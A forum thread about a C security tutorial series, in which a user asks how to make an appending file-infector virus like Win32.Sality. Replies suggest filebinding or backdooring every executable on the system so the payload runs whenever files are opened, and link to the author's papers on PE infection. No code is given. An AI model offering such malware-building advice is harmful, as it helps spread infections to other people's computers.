Nice article, although only the first paragraph and link to the real article original article on the main page should be supplied.
I think I prefer posting onto the forum from now on. You could just modify the one on the front page or remove it entirely.
1 Like
Great article DTM! I’m sure it’ll help a lot of people out!
This really changed how we do things! The old way was cool! 
Hello @dtm I’ve been reading your Security-Oriented C tutorial since Null Byte didn’t change their theme.Since they changed the website your tutorials is lacking some parts.Like this article : http://null-byte.wonderhowto.com/how-to/security-oriented-c-tutorial-0xf9-spy-with-my-little-program-keylogging-101-0169950/
Not just your tutorials,OccupyTheWeb and the others’ articles have same problem.
Where can I find your full Security-Oriented C tutorials?
They were great series.I want to read all you’ve written but not in Null Byte.So do you have word documents of these written series.If yes,can you send me please?
I don’t have a back up of them but somebody else might. Which ones were you specifically looking for?
Especially from 0x0c tutorial to end tutorial.But if someone backed up of them I need all of them.Because they were absolutely excellent articles.I’ve really liked them.
Thanks for the support but the series has been concluded. There are no missing articles there, only missing information on the higher numbered ones.
Thanks for your help.
Hello @dtm
I could find the original articles from Security-Oriented C series using “Archive.org”.
And I wanted to ask you a question (sorry if I’m posting this at the wrong place).
In tutorial 0xFE (It lives), I tried to use append binary “ab” mode instead of “wb” mode so that the infected file could run itself and then the virus, but only the victim file executed.
Is it related to EOF at the end of the (original) infected file?
How can I make it work, something like Win32.Sality?
Thanks for the series and I’m eagerly willing to see your answer 
I don’t know if he even remembers the exact content of each article. If you can link to the article on archive.org it might give you a better chance of reply.
Of course (and thanks for the advice)
Please PM me with Win32.Sality’s code and I will get back to you on the NB article.
Well by mentioning Sality I just wanted to give an example of a virus which doesn’t overwrite and destroy the victim file but appends to it and as the result, when you execute the infected victim file, both the victim file and the virus run.
But if you wish I will try to find out exactly how Sality works 
Hmm this indeed is an interesting concept. You could be mega dirty and just filebind everything. (This would break a lot too though).
You might be best off backdooring the program that opens those files, perhaps every executable on the system? Then when you open a text file, command prompt, or a spreadsheet, you are opening the payload too.
Okay, I see what you mean by using mode ab but unfortunately, it’s not quite as simple as you think it is.
I’ve already documented a method for this in my paper PE File Infection and have done an analysis on a simple appending virus Understanding a Win32 Virus: Code Analysis with background material Understanding a Win32 Virus: Background Material.
1 Like
Thank you both of you. I will study the papers and see if I can put them into practice.
Maybe I would go mega-dirty!
This topic was automatically closed after 30 days. New replies are no longer allowed.